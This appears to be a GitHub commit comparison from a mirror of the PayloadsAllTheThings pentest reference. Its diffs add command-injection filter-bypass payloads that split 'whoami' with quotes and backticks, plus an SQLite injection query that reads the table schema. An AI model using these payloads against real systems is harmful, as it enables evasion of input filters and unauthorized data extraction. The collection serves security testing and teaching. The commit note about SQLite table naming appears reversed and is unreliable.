1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-09 20:06:17 +02:00

Compare commits

...

4 Commits

Author SHA1 Message Date
Swissky 80dda8beeb
Merge pull request #710 from mohnad-0b/patch-1
Update SQLite Injection.md
2024-04-03 18:15:31 +02:00
Swissky 8ef458db2a
Merge pull request #708 from xplo1t-sec/master
bypass techniques added
2024-04-03 18:15:03 +02:00
mohnad banat d834abe43c
Update SQLite Injection.md
Since sqlite version 3.33.0, sqlite_schema has been replaced by sqlite_master.
2024-04-01 20:46:09 +03:00
xplo1t-sec 033982dc30 bypass techniques added 2024-03-09 21:46:33 +05:30
2 changed files with 13 additions and 1 deletions

View File

@ -18,6 +18,7 @@
* [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-single-quote)
* [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backticks](#bypass-with-backticks)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-)
* [Bypass with $()](#bypass-with--1)
@ -245,12 +246,20 @@ root:x:0:0:root:/root:/bin/bash
```powershell
w'h'o'am'i
wh''oami
```
#### Bypass with double quote
```powershell
w"h"o"am"i
wh""oami
```
#### Bypass with backticks
```powershell
wh``oami
```
#### Bypass with backslash and slash

View File

@ -33,7 +33,10 @@ select sqlite_version();
```sql
SELECT sql FROM sqlite_schema
```
if sqlite_version > 3.33.0
```sql
SELECT sql FROM sqlite_master
```
## Integer/String based - Extract table name
```sql